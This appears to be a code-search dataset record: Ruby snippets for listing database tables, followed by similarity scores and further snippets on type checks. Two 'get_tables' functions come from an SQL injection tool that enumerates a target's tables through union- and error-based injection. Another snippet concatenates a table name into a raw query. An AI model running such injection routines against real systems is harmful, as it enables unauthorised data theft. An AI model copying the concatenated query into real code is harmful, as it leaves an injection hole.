"def tables\n self.probe_tables unless @tables\n @tables\n end",
"def tables(name = nil) #:nodoc:\n select_all(\"select decode(table_name,upper(table_name),lower(table_name),table_name) name from all_tables where owner = sys_context('userenv','session_user')\").map {|t| t['name']}\n end",
"def each_table_name\n return enum_for(:each_table_name) unless block_given?\n\n data_dictionary.each_table do |record|\n yield record[\"NAME\"]\n end\n\n nil\n end",
"def table_name\n if qualified? && meta[:qualified].is_a?(Symbol)\n meta[:qualified]\n else\n source.dataset\n end\n end",
"def tables(name = nil, database = nil, like = nil)\n database = database ? quote_table_name(database) : \"DATABASE()\"\n by_name = like ? \"AND table_name LIKE #{quote(like)}\" : \"\"\n\n sql = <<-SQL.squish\n SELECT table_name, table_type\n FROM information_schema.tables\n WHERE table_schema = #{database}\n AND table_type = 'BASE TABLE'\n #{by_name}\n SQL\n\n execute_and_free(sql, 'SCHEMA') do |result|\n rows_from(result).map(&:first)\n end\n end",
"def schema_tables\n @schema_tables ||= %i[\n projects\n amazon_clouds\n data_centers\n jmeter_plans\n load_agents\n target_hosts\n clusters\n execution_cycles\n client_stats\n page_stats\n target_stats\n jtl_files\n ]\n end",
"def list_tables(table=nil)\n q = table ? \"show tables like '#{quote table}'\" : \"show tables\"\n query(q).map(&:first)\n end",
"def tables\n @tables ||= {}.tap do |tables|\n parsed_data['tables'].map do |table|\n parsed_table_rows = parse_choices(table['rows'])\n tables[table['id']] = Table.new(table['name'], table['parameters'], parsed_table_rows)\n end\n end\n end",
"def schema_ds_from(table_name, opts)\n [:information_schema__tables___t]\n end",
"def get_tables(options={})\n return send_message(SkyDB::Message::GetTables.new(options))\n end",
"def tables(name = nil) #:nodoc:\r\n sql = \"EXECUTE PROCEDURE sp_GetTables( NULL, NULL, NULL, 'TABLE' );\"\r\n select(sql, name).map { |row| strip_or_self(row[\"TABLE_NAME\"]) }\r\n end",
"def table_names\n @tables.keys\n end",
"def get_tables\r\n table_names = []\r\n tables = @db.execute <<-SQL\r\n SELECT name FROM sqlite_master\r\n WHERE type='table'\r\n ORDER BY name;\r\n SQL\r\n tables.each do |row| \r\n table_names << row[\"name\"]\r\n end\r\n table_names\r\n end",
"def db_queries_table__samples\n [\n \"table1\",\n \"table2\"\n ]\n end",
"def get_tables\n get_schemas.keys\n end",
"def tables(opts={'start' => nil, 'limit' => nil})\n Cursor.new({'collection' => \"tables\",\n 'start' => opts['start'],\n 'limit' => opts['limit']}.update(@opts)) {|x| Table.new(@opts, x)}\n end",
"def current_schemata\n extension :pg_array\n metadata_dataset.select(Sequel::function(:current_schemas, false).\n cast('varchar[]')).single_value.map(&:to_sym)\n end",
"def list\n Table.with_db do |db|\n return @db\n .execute(\"select name from sqlite_master where type='table' ORDER BY name;\")\n .flatten \n end\n end",
"def show_tables\n execute('select table_name from information_schema.tables where table_schema = ?', [schema])\n end",
"def list_tables\n data.keys\n end",
"def schema_and_table_name\n if qualified_table_name.include? '.'\n schema_name, table_name = qualified_table_name.split('.', 2)\n else\n table_name = qualified_table_name\n schema_name = self.class.default_schema_name\n end\n [schema_name, table_name]\n end",
"def get_table_names\n raise \"No database file selected.\" unless $current_db\n\n $tables = get_data \"select name from sqlite_master\"\n $tables.collect!{|x| x[0] } ## 1.9 hack, but will it run on 1.8 ??\n $tables\nend",
"def table_names\n with_admin { |admin| admin.list_tables.map(&:name_as_string) }\n end",
"def tables\n return nil unless has_connection?\n self.connection.tables\n end",
"def tables\n @connection.tables.select {|row| row.to_s !~ /^system_/i }\n end",
"def base_tables(name = nil)\n # this is untested\n select_values(\"SELECT table_name FROM information_schema.tables\", name)\n end",
"def tables(name = nil)\n query(<<-SQL, 'SCHEMA').map { |row| row[0] }\n SELECT tablename\n FROM pg_tables\n WHERE schemaname = ANY (ARRAY['public'])\n SQL\n end",
"def get_tables\n\t\t@@tables\n\tend",
"def tables_for_sql\n @tables_for_sql ||= RailsRedshiftReplicator.replicable_target_tables.join(\",\")\n end",
"def tables(name = nil) #:nodoc:\n tables = @connection.tables\n tables.reject! { |t| /\\A_SYS_/ === t }\n tables\n end",
"def all\n partitions.group_by { |row| row['table_name'] }.map(&method(:to_tablature_table))\n end",
"def schema_parse_table(table_name, opts)\n m = output_identifier_meth(opts[:dataset])\n\n table = if opts[:schema]\n Sequel.qualify(opts[:schema], table_name)\n else\n Sequel.identifier(table_name)\n end\n\n describe(table, opts).map do |row|\n row[:db_type] = row[:type]\n row[:type] = schema_column_type(row[:db_type])\n row[:default] = nil\n row[:primary_key] = false\n [m.call(row.delete(:name)), row]\n end\n end",
"def table_names\n @table_names ||= entities.map{|entity|entity.model.table_name}.uniq\n end",
"def tablename; datastore['TABLENAME']; end",
"def tables(name = nil)\n query(<<-SQL, name).map { |row| row[0] }\n SELECT table_name\n FROM v_catalog.tables\n WHERE table_schema = 'public'\n SQL\n end",
"def tables\n tables = []\n @a.keys.each{|e| if !e.match(/_base$/) then tables.push(e) end}\n tables\n end",
"def each_table(&block)\n if block_given?\n @tables.each_value(&block)\n self\n else\n @tables.values\n end\n end",
"def tables\n raise 'SevenZip#tables should never be called'\n end",
"def get_tables(params)\n tables = []\n params.each do |param|\n \tp = param.split(\":\")\n \tnext if p.first != \"table\"\n tables << p[1] if p[0] == \"table\"\n end\n raise TypeError, Ajaila::Messager.warning(\"No tables included. Add: \\\"table:SomeTable\\\"\") if tables == []\n return tables\n end",
"def tables(name = nil) #:nodoc:\n tables = @connection.tables\n tables.reject! { |t| /\\A_SYS_/ === t }\n end",
"def schema_parse_tables(opts)\n schemas = {}\n schema_ds(nil, opts).each do |row|\n (schemas[row.delete(:table_name).to_sym] ||= []) << row\n end\n schemas.each do |table, rows|\n schemas[table] = schema_parse_rows(rows)\n end\n schemas\n end",
"def schema\n execute(<<-eosql).collect { |row| row[0] }.collect { |t| table_schema(t) }\nSELECT rdb$relation_name FROM rdb$relations WHERE rdb$system_flag != 1\neosql\n end",
"def table_names\n @table_names ||= ActiveRecord::Base.connection.tables - excluded_table_names\n end",
"def schema_ds_filter(table_name, opts)\n if table_name\n [{:c__table_name=>table_name.to_s}]\n else\n [{:t__table_type=>'BASE TABLE'}]\n end\n end",
"def table_names\n structure_yml.to_a.map { |s| s.first }.select{ |tn| tn != SHARED_COLUMNS }\n end",
"def tables(query)\n SqlAssess::Parsers::Tables.new(query).tables.map do |table|\n if table.key?(:join_type)\n table[:table][:table].remove('`')\n else\n table[:table].remove('`')\n end\n end\n end",
"def table(*query_names, &block)\n each_query(query_names) do |query|\n query.table_settings = block\n end\n end",
"def list_names_of_all_tables\n tables = @stargate.list_tables\n tables.collect { |t| t.name}\n end",
"def table_elements(identifier)\n platform.tables_for(identifier.clone)\n end",
"def named_tables( names )\n @tables.values_at( *names )\n end",
"def probe_tables\n master.probe\n\n @probe_lock.synchronize do\n return unless @tables.nil?\n\n db = standby_slaves.last || active_slaves.last || master\n if db && db.running?\n output \"Probing tables via #{db}\"\n else\n output \"Warning: unable to probe tables\"\n return\n end\n\n @tables = []\n sql = \"SHOW TABLES\"\n db.query_return_array(sql).each do |tbl|\n table_name = tbl.values.first\n @tables << db.detect_table_schema(table_name)\n end\n end\n end",
"def tables()\n return MicrosoftGraph::Drives::Item::Items::Item::Workbook::Tables::TablesRequestBuilder.new(@path_parameters, @request_adapter)\n end",
"def get_myisam_tables(mysql2_client)\n target_schemas = SCHEMA_EXCLUSIONS.map { |x| \"'#{x}'\" }\n schema_list = target_schemas.join(', ')\n query = 'SELECT TABLE_SCHEMA, TABLE_NAME, ENGINE ' \\\n ' FROM INFORMATION_SCHEMA.TABLES ' \\\n ' WHERE ENGINE = \\'MyISAM\\' ' \\\n \" AND TABLE_SCHEMA NOT IN (#{schema_list}) \"\n\n # puts \"SQL: #{query}\"\n results = mysql2_client.query(query)\n tables = []\n results.each do |row|\n tables << \"`#{row['TABLE_SCHEMA']}`.`#{row['TABLE_NAME']}`\"\n end\n tables\nend",
"def get_tables\n if @target_config['CDB_TABLES'].empty?\n if not @target_config['VERSION'].nil?\n if @target_config['VERSION'].scan(/./)[0].to_i < 5\n # MySQL < 5\n print_error(\"MySQL < 5: #{@target_config['VERSION']}\")\n print_error(\"There is no information_schema to query for tables as result.....\")\n if not @target_config['CURRENT_DB'].nil?\n print_error(\"Do you want to try Common Table Names (Y/N)?\")\n answer=gets.chomp\n print_line(\"\")\n if answer.upcase == 'Y' or answer.upcase == 'YES'\n tables = common_tables('CURRENT-DB', \"#{HOME}fuzz/common_tables.lst\")\n if tables.empty?\n print_error(\"OK, returning to menu...\")\n return nil\n else\n print_good(\"DB: #{@target_config['CURRENT_DB']}\")\n print_good(\"Tables: #{tables.join(', ').sub(/, $/, '')}\")\n @target_config['CDB_TABLES'] = tables\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES'] unless @target_config['CURRENT_DB'].nil?\n @target_config['DB_TABLES']['Current DB'] = @target_config['CDB_TABLES'] if @target_config['CURRENT_DB'].nil?\n return tables.join(' ')\n end\n else\n print_error(\"OK, returning to menu...\")\n return nil\n end\n else\n print_error(\"OK, returning to menu...\")\n return nil\n end\n else\n # MySQL >= 5\n if @target_config['CURRENT_DB'].nil?\n print_error(\"Current DB has not yet been discovered!\")\n print_error(\"Try BASIC command if you haven't already!\")\n print_error(\"You can also use DBTABLES command if you know the DB Name....\")\n print_error(\"FUZZ_TABLES can be used as a last resort as well if you know the DB Name...\")\n return nil\n else\n count=0\n tables=[]\n query = 'select count(table_name) from information_schema.tables where table_schema=database()'\n results = union_basic_inject($config['INJECTOR']['MYSQL']['UNION']['VULN_COLUMN'].to_i, query)\n if results.nil?\n query = 'select count(table_name) from information_schema.tables where table_schema=schema()'\n results = union_basic_inject($config['INJECTOR']['MYSQL']['UNION']['VULN_COLUMN'].to_i, query)\n if results.nil?\n query = \"select count(table_name) from information_schema.tables where table_schema=#{@target_config['CURRENT_DB'].mysqlhex}\"\n results = union_basic_inject($config['INJECTOR']['MYSQL']['UNION']['VULN_COLUMN'].to_i, query)\n if results.nil?\n print_error(\"Unable to determine number of tables in current database, sorry....\")\n end\n end\n end\n if not results.nil?\n print_good(\"Fetching #{results} Tables from Current DB\")\n case query\n when /database()/\n dbn='database()'\n when /schema()/\n dbn='schema()'\n when /0x[a-z0-9]{1,}/\n dbn=\"#{@target_config['CURRENT_DB'].mysqlhex}\"\n end\n while not results.nil?\n results = union_basic_inject($config['INJECTOR']['MYSQL']['UNION']['VULN_COLUMN'].to_i, \"select table_name from information_schema.tables where table_schema=#{dbn} limit #{count},1\")\n pad = ' ' * (results.size + 25) unless results == '' or results.nil?\n pad = ' ' * 50 if results.nil?\n print \"\\r(#{count})> #{results}#{pad}\".cyan unless results == ''\n tables << results unless results == ''\n count = count.to_i + 1\n end\n print_line(\"\")\n if tables.empty?\n print_line(\"\")\n print_error(\"Unable to get any tables from the current database!\")\n print_error(\"Lack of privileges? 
IDK....\")\n print_status(\"Possible Solutions include:\")\n print_caution(\"A) Become HR's best friend by updating the code and sending him a copy\")\n print_caution(\"B) Tweak Settings and try things again\")\n print_caution(\"C) Be a bawz and do it manually\")\n print_line(\"\")\n return nil\n else\t\n @target_config['CDB_TABLES'] = tables\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES'] unless @target_config['CURRENT_DB'].nil?\n @target_config['DB_TABLES']['Current DB'] = @target_config['CDB_TABLES'] if @target_config['CURRENT_DB'].nil?\n print_good(\"Current DB: #{@target_config['CURRENT_DB']}\")\n print_good(\"Tables: #{tables.join(', ').sub(/, $/, '')}\")\n return tables.join(' ')\n end\n else\n print_error(\"Do you want to try Common Table Names (Y/N)?\")\n answer=gets.chomp\n print_line(\"\")\n if answer.upcase == 'Y' or answer.upcase == 'YES'\n tables = common_tables('CURRENT-DB', \"#{HOME}fuzz/common_tables.lst\")\n if tables.empty?\n print_error(\"OK, returning to menu...\")\n return nil\n else\n print_good(\"DB: #{@target_config['CURRENT_DB']}\")\n print_good(\"Tables: #{tables.join(', ').sub(/, $/, '')}\")\n @target_config['CDB_TABLES'] = tables\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES']\n return tables.join(' ')\n end\n else\n print_error(\"OK, returning to menu...\")\n return nil\n end\n end\n end\n end\n else\n print_error(\"No version info collected yet!\")\n print_error(\"Try using the BASIC comamnd and then try again....\")\n print_error(\"You could also use the FUZZ TABLES option....\")\n end\n else\n print_good(\"DB: #{@target_config['CURRENT_DB']}\") unless @target_config['CURRENT_DB'].nil?\n print_good(\"Tables: #{@target_config['CDB_TABLES'].join(', ').sub(/, $/, '')}\")\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES'] unless @target_config['CURRENT_DB'].nil?\n @target_config['DB_TABLES']['Current DB'] = @target_config['CDB_TABLES'] if @target_config['CURRENT_DB'].nil?\n end\n end",
"def tables(key = nil)\n key ||= properties.key1\n response = table_response(key, nil, \"Tables\")\n JSON.parse(response.body)['value'].map{ |t| Table.new(t) }\n end",
"def get_tables\n if @target_config['CDB_TABLES'].empty?\n if not @target_config['VERSION'].nil?\n if @target_config['VERSION'].scan(/./)[0].to_i < 5\n # MySQL < 5\n print_error(\"MySQL < 5: #{@target_config['VERSION']}\")\n print_error(\"There is no information_schema to query for tables as result.....\")\n if not @target_config['CURRENT_DB'].nil?\n print_error(\"Do you want to try Common Table Names (Y/N)?\")\n answer = gets.chomp\n print_line(\"\")\n if answer.upcase == 'Y' or answer.upcase == 'YES'\n tables = common_tables('CURRENT-DB', \"#{HOME}fuzz/common_tables.lst\")\n if tables.empty?\n print_error(\"OK, returning to menu...\")\n return nil\n else\n print_good(\"DB: #{@target_config['CURRENT_DB']}\")\n print_good(\"Tables: #{tables.join(', ').sub(/, $/, '')}\")\n @target_config['CDB_TABLES'] = tables\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES'] unless @target_config['CURRENT_DB'].nil?\n @target_config['DB_TABLES']['Current DB'] = @target_config['CDB_TABLES'] if @target_config['CURRENT_DB'].nil?\n return tables.join(' ')\n end\n else\n print_error(\"OK, returning to menu...\")\n return nil\n end\n else\n print_error(\"OK, returning to menu...\")\n return nil\n end\n else\n # MySQL >= 5\n if @target_config['CURRENT_DB'].nil?\n print_error(\"Current DB has not yet been discovered!\")\n print_error(\"Try BASIC command if you haven't already!\")\n print_error(\"You can also use DBTABLES command if you know the DB Name....\")\n print_error(\"FUZZ_TABLES can be used as a last resort as well if you know the DB Name...\")\n return nil\n else\n count = 0\n tables=[]\n query = 'select count(table_name) from information_schema.tables where table_schema=database()'\n results = error_basic_inject(query)\n if results.nil?\n query = 'select count(table_name) from information_schema.tables where table_schema=schema()'\n results = error_basic_inject(query)\n if results.nil?\n query = \"select count(table_name) from information_schema.tables where table_schema=#{@target_config['CURRENT_DB'].mysqlhex}\"\n results = error_basic_inject(query)\n if results.nil?\n print_error(\"Unable to determine number of tables in current database, sorry....\")\n end\n end\n end\n if not results.nil?\n print_good(\"Fetching #{results} Tables from Current DB\") unless results.nil?\n case query\n when /database()/\n dbn = 'database()'\n when /schema()/\n dbn = 'schema()'\n when /0x[a-z0-9]{1,}/\n dbn = \"#{@target_config['CURRENT_DB'].mysqlhex}\"\n end\n while not results.nil?\n results = error_basic_inject(\"select table_name from information_schema.tables where table_schema=#{dbn} limit #{count},1\")\n pad = ' ' * (results.size + 25) unless results.nil? or results == ''\n pad = ' ' * 50 if results.nil? or results == ''\n\t\tprint \"\\r(#{count})> #{results}#{pad}\".cyan unless results == ''\n\t\ttables << results unless results == ''\n\t\tcount = count.to_i + 1\n end\n print_line(\"\")\n if tables.empty?\n print_line(\"\")\n print_error(\"Unable to get any tables from the current database!\")\n print_error(\"Lack of privileges? 
IDK....\")\n print_status(\"Possible Solutions include:\")\n print_caution(\"A) Become HR's best friend by updating the code and sending him a copy\")\n print_caution(\"B) Tweak Settings and try things again\")\n print_caution(\"C) Be a bawz and do it manually\")\n print_line(\"\")\n return nil\n else\t\n @target_config['CDB_TABLES'] = tables\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES']\n print_good(\"Current DB: #{@target_config['CURRENT_DB']}\")\n print_good(\"Tables: #{tables.join(', ').sub(/, $/, '')}\")\n return tables.join(' ')\n end\n else\n print_error(\"Do you want to try Common Table Names (Y/N)?\")\n answer = gets.chomp\n print_line(\"\")\n if answer.upcase == 'Y' or answer.upcase == 'YES'\n tables = common_tables('CURRENT-DB', \"#{HOME}fuzz/common_tables.lst\")\n if tables.empty?\n print_error(\"OK, returning to menu...\")\n return nil\n else\n print_good(\"DB: #{@target_config['CURRENT_DB']}\")\n print_good(\"Tables: #{tables.join(', ').sub(/, $/, '')}\")\n @target_config['CDB_TABLES'] = tables\n @db_tables[\"#{@error_cdb}\"] = @target_config['CDB_TABLES']\n return tables.join(' ')\n end\n else\n print_error(\"OK, returning to menu...\")\n return nil\n end\n end\n end\n end\n else\n print_error(\"No version info collected yet!\")\n print_error(\"Try using the BASIC comamnd and then try again....\")\n print_error(\"You could also use the FUZZ TABLES option....\")\n end\n else\n print_good(\"DB: #{@target_config['CURRENT_DB']}\") unless @target_config['CURRENT_DB'].nil?\n print_good(\"Tables: #{@target_config['CDB_TABLES'].join(', ').sub(/, $/, '')}\")\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES'] unless @target_config['CURRENT_DB'].nil?\n @target_config['DB_TABLES']['Current DB'] = @target_config['CDB_TABLES'] if @target_config['CURRENT_DB'].nil?\n end\n end",
"def sqlite3_all_tables\n return @dbh.execute(\"select * from sqlite_master where type='table';\")\n end",
"def get_all_tables\n\t\ttc = new_sub(@discovery['tables']['url'], @discovery['tables']['capability'])\n\t\ttc.listen.map {|x| JSON.parse(x) rescue nil}.compact\n\tend",
"def _dump_tables(opts)\n if opts[:schema]\n _literal_table_sort(tables(opts.merge(:qualify=>true)))\n else\n tables(opts).sort\n end\n end",
"def find_tables_to_process\n return @tables unless @tables.nil?\n temp = ARGV\n temp = list_available_tables if temp.nil? || temp.empty?\n @tables = {}\n temp.each do |t|\n t = t.scan(/[a-z0-9\\-_]/i).join\n debug \"Checking #{t}\"\n # only add tables if they exist AND have an abstract_form column\n begin\n form = RT.custom_query(\"SELECT abstract_form FROM #{t}\", [], true)\n form = Marshal.load(Base64.decode64(form[\"abstract_form\"]))\n valid_fields = form.questions.collect do |q|\n SUPPORTED_TYPES.include?(q.type) ? q.db_column : nil\n end\n valid_fields.compact!\n # HACK HACK HACK! Remove after current eval. FIXME FIXME FIXME\n if valid_fields.include?(\"tutnum\")\n valid_fields.delete(\"tutnum\")\n valid_fields << \"tutor_id\"\n end\n\n @tables[t] = valid_fields.flatten unless valid_fields.empty?\n rescue => e\n debug \"Table #{t} doesn't appear to be valid or doesn’t exist.\"\n debug \"Error message: #{e.message}\"\n end\n end\n @tables\n end",
"def split_qualifiers(table_name)\n schema_utility_dataset.split_qualifiers(table_name)\n end",
"def get_all_data(table)\n return $db.execute('SELECT * FROM ' + table);\n end",
"def query_tables(options = {})\n query = new_query(options)\n query[TableConstants::NEXT_TABLE_NAME] = options[:next_table_token] if options[:next_table_token]\n\n options[:request_location_mode] = Azure::Storage::Common::RequestLocationMode::PRIMARY_OR_SECONDARY\n uri = collection_uri(query, options)\n\n headers = {\n Azure::Storage::Common::HeaderConstants::ACCEPT => Serialization.get_accept_string(options[:accept]),\n }\n\n response = call(:get, uri, nil, headers, options)\n entries = Serialization.table_entries_from_json(response.body) || []\n values = Azure::Storage::Common::Service::EnumerationResults.new(entries)\n values.continuation_token = response.headers[TableConstants::CONTINUATION_NEXT_TABLE_NAME]\n values\n rescue => e\n raise_with_response(e, response)\n end",
"def create(tablename)\n #allow us to pass either a single symbol or an array of symbols.\n if Symbol === tablename\n tablename = [tablename]\n end\n\n tablename.each do |table|\n #standard creation protocol.\n $BS.create table\n\n #here is the reflective magic. Defined below in this list is this thingy.\n $BS.connect {|db| eval \"data_#{table} db\"}\n end\n\n $BS\nend",
"def schema_ds(table_name, opts)\n schema_ds_dataset.from(*schema_ds_from(table_name, opts)) \\\n .select(*schema_ds_select(table_name, opts)) \\\n .join(*schema_ds_join(table_name, opts)) \\\n .filter(*schema_ds_filter(table_name, opts))\n end",
"def blob_tables\n execute('select table_name from information_schema.tables where table_schema = ?', ['blob']).map(&:first)\n end",
"def schema(table_name = nil, opts={})\n table_name = table_name.to_sym if table_name\n if opts[:reload] && @schemas\n if table_name\n @schemas.delete(table_name)\n else\n @schemas = nil\n end\n end\n\n if @schemas\n if table_name\n return @schemas[table_name] if @schemas[table_name]\n else\n return @schemas\n end\n end\n\n if table_name\n @schemas ||= {}\n if respond_to?(:schema_parse_table, true)\n @schemas[table_name] ||= schema_parse_table(table_name, opts)\n else\n raise Error, 'schema parsing is not implemented on this database'\n end\n else\n if respond_to?(:schema_parse_tables, true)\n @schemas = schema_parse_tables(opts)\n elsif respond_to?(:schema_parse_table, true) and respond_to?(:tables, true)\n tables.each{|t| schema(t, opts)}\n @schemas\n else\n raise Error, 'schema parsing is not implemented on this database'\n end\n end\n end",
"def dataset\n database[table_name]\n end",
"def tables_with_referential_integrity\n schemas_and_tables = select_rows <<-SQL.strip_heredoc\n SELECT s.name, o.name\n FROM sys.foreign_keys i\n INNER JOIN sys.objects o ON i.parent_object_id = o.OBJECT_ID\n INNER JOIN sys.schemas s ON o.schema_id = s.schema_id\n SQL\n schemas_and_tables.map do |schema_table|\n schema, table = schema_table\n \"#{SQLServer::Utils.quoted_raw(schema)}.#{SQLServer::Utils.quoted_raw(table)}\"\n end\n end",
"def table(args={})\n args[:connection_name] = @connection_name unless args.has_key?(:connection_name)\n req(:required => [:table_name, :db_name],\n :args_object => args)\n dbh = Mysqladmin::Exec.new(:connection_name => args[:connection_name])\n dbh.use(args[:db_name])\n dbh.query(:sql => \"SHOW TABLE STATUS LIKE '#{args[:table_name]}'\")\n if dbh.rows > 0\n dbh.fetch_hash do |table_data|\n return {\n :table_name => table_data[\"Name\"],\n :engine => table_data[\"Engine\"].downcase,\n :data_length => table_data[\"Data_length\"].to_i,\n :index_length => table_data[\"Index_length\"].to_i,\n :total_length => (table_data[\"Data_length\"].to_i + table_data[\"Index_length\"].to_i),\n :collation => table_data[\"Collation\"].downcase,\n :rows => table_data[\"Rows\"].to_i,\n :avg_row_length => table_data[\"Avg_row_length\"].to_i,\n :max_data_length => table_data[\"Max_data_length\"].to_i,\n :row_format => table_data[\"Row_format\"].downcase\n }\n end\n end\n \n # :connection_name => The named connection to use for database statistics,\n # :db_name => The database to gather statistics on\n def database(args={})\n args[:connection_name] = @connection_name unless args.has_key?(:connection_name)\n req(:required => [:db_name],\n :args_object => args)\n data = {}\n dbh = Mysqladmin::Exec.new(:connection_name => args[:connection_name])\n dbh.use(args[:db_name])\n dbh.list_tables.each do |table_name|\n data[table_name] = table(:table_name => args[:table_name], :db_name => args[:db_name], :connection_name => args[:connection_name])\n end\n return data\n end\n \n end",
"def table\n Airmodel.client.table base_config[:base_id], base_config[:table_name]\n end",
"def load_tables\n tables = @table_ast.keys\n tables.each {|table|\n columns = Hash.new\n column_names = @table_ast[table].keys\n rows = @dbh.execute(\"SELECT * FROM #{table}\")\n @mem_db_row[table] = rows\n column_names.each {|col|\n col_data = Array.new\n rows.each {|data|\n col_data.push(data[col])\n }\n columns[col] = col_data\n }\n @mem_db_col[table] = columns\n }\n return @mem_db_col, @mem_db_row\n end",
"def all_database_names\n @specs_store.names\n end",
"def schema_and_table(table_name)\n schema_utility_dataset.schema_and_table(table_name)\n end"
] |
[
"0.6650578",
"0.65994585",
"0.6580728",
"0.65064585",
"0.64151305",
"0.64074725",
"0.63925153",
"0.6348351",
"0.6316044",
"0.62666374",
"0.6252346",
"0.6231937",
"0.6230909",
"0.6217725",
"0.6167698",
"0.6167294",
"0.61424625",
"0.6121533",
"0.61198103",
"0.60758275",
"0.60737467",
"0.6058681",
"0.60242254",
"0.6013441",
"0.5990216",
"0.5988396",
"0.5960738",
"0.59241354",
"0.5911711",
"0.5908636",
"0.5865367",
"0.5836293",
"0.5834977",
"0.5833594",
"0.5825647",
"0.582509",
"0.5802654",
"0.57607913",
"0.5729208",
"0.5726156",
"0.570596",
"0.56994045",
"0.5642556",
"0.5637554",
"0.5635532",
"0.5621742",
"0.5611418",
"0.5596214",
"0.55914265",
"0.5575496",
"0.55741274",
"0.5568407",
"0.55625385",
"0.55616635",
"0.5544475",
"0.553489",
"0.5514156",
"0.5503492",
"0.5487825",
"0.5476753",
"0.54645514",
"0.5463986",
"0.54623586",
"0.5456308",
"0.5451666",
"0.5448607",
"0.54124975",
"0.5401025",
"0.53729326",
"0.53678423",
"0.53621763",
"0.5353218",
"0.5351982",
"0.5345993",
"0.53346807",
"0.53141004",
"0.53059256",
"0.5304973",
"0.5284267",
"0.5279987",
"0.5265574",
"0.52537584",
"0.5235786",
"0.5220678",
"0.5217942",
"0.5215813",
"0.5214394",
"0.5213506",
"0.52125305",
"0.5193673",
"0.519228",
"0.51772743",
"0.5173065",
"0.51659846",
"0.5164582",
"0.51635516",
"0.5144852",
"0.5132873",
"0.51286834",
"0.5119439"
] |
0.6096867
|
19
|
Check whether the given type name string/symbol (e.g. :hstore) is supported by the database.
|
def type_supported?(type)
Sequel.synchronize{return @supported_types[type] if @supported_types.has_key?(type)}
supported = from(:pg_type).where(:typtype=>'b', :typname=>type.to_s).count > 0
Sequel.synchronize{return @supported_types[type] = supported}
end
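
Context for this record: the lookup counts base types (typtype 'b') in pg_type with the given typname and memoizes the answer in @supported_types under Sequel's synchronization lock, so the catalog is queried at most once per type. A short usage sketch, assuming DB is a Sequel postgres Database:

DB.type_supported?(:hstore)   # => true once CREATE EXTENSION hstore has run
DB.type_supported?(:citext)   # => false if the citext extension is absent
DB.type_supported?(:hstore)   # repeat calls hit the cache; no pg_type query
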
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports?(dbtype)\n (:ctan.eql? dbtype.to_sym)\n end",
"def valid_type?(type)\n !native_database_types[type].nil?\n end",
"def type_exists?(name)\n user_defined_types.key? name.to_s\n end",
"def supports?(type)\n supported.include? type.to_sym\n end",
"def check_type(type)\n %w{galera mysql}.each do |t|\n return true if t == type\n end\n false\n end",
"def kind?(name)\n table[name]&.kind\n end",
"def supported?(name); end",
"def has_type?(type_sym)\n each_term do |term|\n if is?(term, type_sym)\n return true\n end\n end\n \n false\n end",
"def is_strtype?(); @type == GRT_STRTYPE; end",
"def is_strname?(); @type == GRT_STRNAME; end",
"def has_typekit?(name)\n available_typekits.has_key?(name)\n end",
"def is?(term, type_sym)\n return term[:type] == type_sym\n end",
"def valid_name?\n proto_table.key?(@name)\n end",
"def valid_type?\n %w[host web].include? type\n end",
"def valid?\n ENUM.include? @type.downcase.to_sym\n end",
"def type_registered?(klass_or_type)\n end",
"def is_type? sym\n self.class == Content::TYPES[sym]\n end",
"def has_type?\n ! get_internal_word(TYPE_INDEX).nil?\n end",
"def is_datatype?(); @type == GRT_DATATYPE; end",
"def type_allowed? type # Will check if the type is included in the list_types hash\n return @@list_types.keys.include?(type.to_sym)\n end",
"def can_be?(btype)\n backend_types.keys.include?(btype)\n end",
"def needs_encoding?\n ![ :binary, :date, :datetime, :boolean, :float, :integer ].include?(type)\n end",
"def valid_data_type_for_vendor?\n SUPPORTED_VENDOR_DATA_TYPES[@name].include?(@data_source.data_type)\n end",
"def valid_type?\n %w[ip domain cert].include? type\n end",
"def table?\n type == TYPE_CANONICAL\n end",
"def needs_encoding?\n ![ :binary, :date, :datetime, :boolean, :float, :integer ].include?(type)\n end",
"def mapping_name_is_valid?(mapping_name)\n mapping_name.class == Symbol\n end",
"def needs_word?\n if has_type? :reference\n return true\n end\n \n if has_type? :literal\n return true\n end\n \n #otherwise it is only a register or raw special value\n return false\n end",
"def is_string?(); @type == GRT_STRING; end",
"def is_sname?(); @type == GRT_SNAME; end",
"def table_exists?(tablename)\r\n raise(ArgumentError, 'Table name must be a symbol!') unless \\\r\n tablename.is_a?(Symbol)\r\n\r\n return @engine.table_exists?(tablename)\r\n end",
"def string?\n type == \"STRING\"\n end",
"def builtin_type?\n\t\ttrue\n\tend",
"def sc_kind_of?(type)\n if not (type.kind_of?(Class) or type.kind_of?(String))\n raise ArgumentInvalidTypeError.new \"type\", type, 'class < SCObject', String\n end\n \n if type.kind_of?(Class) and type.ancestors.member?(SCObject)\n type = type.represented_sc_class\n end\n \n type = type.downcase\n result = sc_all_classes.detect do |val| \n val.downcase == type\n end\n return (not result.nil?)\n end",
"def use_table?()\n return key =~ /_T$/\n end",
"def valid_entity_type_name name\n @constellation.EntityType[[identifying_role_values, name]] or\n check_valid_nonexistent_object_type_name name\n end",
"def include_type_name?\n type_name != \"_doc\" || connection.version.to_i < 7\n end",
"def is_strclass?(); @type == GRT_STRCLASS; end",
"def is_a?(name)\n\ttarget = Units.parse_symbol(name)\n\t(target && @units.include?(target[:base])) || super(name)\n end",
"def builtin_type?\n\t\tfalse\n\tend",
"def has_class?(sym)\n `var str=' '+this.__native__.className+' ',match=' '+sym.__value__+' '`\n `str.indexOf(match) > -1`\n end",
"def alien?() is_type?( 'Alien'); end",
"def applies_type?(scope, type); end",
"def valid?\n [:region, :security_group, :security_key].all? do |var|\n self.send(var).is_a? String\n end\n end",
